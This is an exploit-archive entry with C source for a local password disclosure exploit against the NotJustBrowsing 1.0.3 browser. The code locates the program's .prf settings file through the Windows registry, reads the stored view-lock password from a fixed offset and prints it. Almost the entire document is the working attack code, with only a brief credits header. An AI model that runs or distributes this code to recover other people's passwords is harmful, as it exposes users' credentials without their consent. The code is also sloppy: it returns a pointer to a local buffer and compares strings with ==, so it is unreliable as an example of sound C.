NotJustBrowsing 1.0.3 Local Password Disclosure Exploit

/***************************************************************** NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan Application: NotJustBrowsing 1.0.3 Procuder: www.notjustbrowsing.com Vulnerable Description: NotJustBrowsing 1.0.3 discloses passwords to local users. Discovered & Coded by Kozan Credits to ATmaCA www.netmagister.com - www.spyinstructors.com kozan@netmagister.com *****************************************************************/ #include <stdio.h> #include <windows.h> HKEY hKey; #define BUFSIZE 100 char prgfiles[BUFSIZE]; DWORD dwBufLen=BUFSIZE; LONG lRet; char *bilgi_oku(int adres,int uzunluk) { if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion", 0, KEY_QUERY_VALUE, &hKey ) == ERROR_SUCCESS) { lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) { RegCloseKey(hKey); return NULL; } RegCloseKey(hKey); strcat(prgfiles,"\\NetLeaf Limited\\NotJustBrowsing\\notjustbrowsing.prf"); int i; FILE *fp; char ch[100]; if((fp=fopen(prgfiles,"rb")) == NULL) { return "NOTINSTALLED"; } fseek(fp,adres,0); for(i=0;i<uzunluk;i++) ch[i]=getc(fp); ch[i]=NULL; fclose(fp); return ch; } } int main() { printf("NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan\n"); printf("Credits to ATmaCA\n"); printf("www.netmagister.com - www.spyinstructors.com\n"); printf("kozan@netmagister.com\n\n"); if(bilgi_oku(4,3)==NULL) { printf("An error occured!\n"); return -1; } if(bilgi_oku(4,3)=="NOTINSTALLED") { printf("NotJustBrowsing 1.0.3 is not installed on your system!\n"); return -1; } printf("View Lock Password: %s",bilgi_oku(4,3)); return 0; } // sebug.net